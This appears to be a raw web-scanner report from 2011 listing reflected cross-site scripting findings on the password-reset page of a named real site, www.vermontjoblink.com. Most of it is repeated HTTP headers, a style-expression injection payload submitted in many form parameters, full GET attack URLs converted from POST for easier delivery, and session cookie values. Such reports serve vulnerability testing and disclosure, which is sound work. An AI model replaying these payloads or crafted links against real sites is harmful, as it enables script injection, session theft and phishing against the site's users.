HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:08 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the OLD_CHOICE_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dca44"style%3d"x%3aexpression(alert(1))"42ce90c0891 was submitted in the OLD_CHOICE_prev parameter. This input was echoed as dca44"style="x:expression(alert(1))"42ce90c0891 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:05 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:09:05'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the RAND_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8a7"style%3d"x%3aexpression(alert(1))"c44cab2e4c1 was submitted in the RAND_prev parameter. This input was echoed as 1c8a7"style="x:expression(alert(1))"c44cab2e4c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:59 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:59'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the SECURITYSYS_prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de510"style%3d"x%3aexpression(alert(1))"dcaa05356ba was submitted in the SECURITYSYS_prev parameter. This input was echoed as de510"style="x:expression(alert(1))"dcaa05356ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:10 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:09:10'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the U_name request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daaf8"style%3d"x%3aexpression(alert(1))"801d98fbf25 was submitted in the U_name parameter. This input was echoed as daaf8"style="x:expression(alert(1))"801d98fbf25 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:35 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:35'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22113"style%3d"x%3aexpression(alert(1))"293bf60f081 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as 22113"style="x:expression(alert(1))"293bf60f081 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:48'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the bltextboxextradonotuse1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06 was submitted in the bltextboxextradonotuse1 parameter. This input was echoed as aa244"style="x:expression(alert(1))"619b41b3cda6e8e06 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=aa244"style%3d"x%3aexpression(alert(1))"619b41b3cda6e8e06&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:06 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5 was submitted in the cftextboxextradonotuse parameter. This input was echoed as 862fa"style="x:expression(alert(1))"ccd6b612736c001e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=862fa"style%3d"x%3aexpression(alert(1))"ccd6b612736c001e5&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:09:03 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The value of the cftextboxextradonotuse request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9626d"style%3d"x%3aexpression(alert(1))"bc06bcef9e was submitted in the cftextboxextradonotuse parameter. This input was echoed as 9626d"style="x:expression(alert(1))"bc06bcef9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:43 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:43'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2035"style%3d"x%3aexpression(alert(1))"4c07fa26276 was submitted in the choice parameter. This input was echoed as b2035"style="x:expression(alert(1))"4c07fa26276 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:39 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:08:39'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The value of the errorfields request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853 was submitted in the errorfields parameter. This input was echoed as d074f"style="x:expression(alert(1))"ea31d84cdc0b4d853 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuseridd074f"style%3d"x%3aexpression(alert(1))"ea31d84cdc0b4d853&cftextboxextradonotuse_error=&formname=Form0&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813 Cache-Control: max-age=0 Origin: https://www.vermontjoblink.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
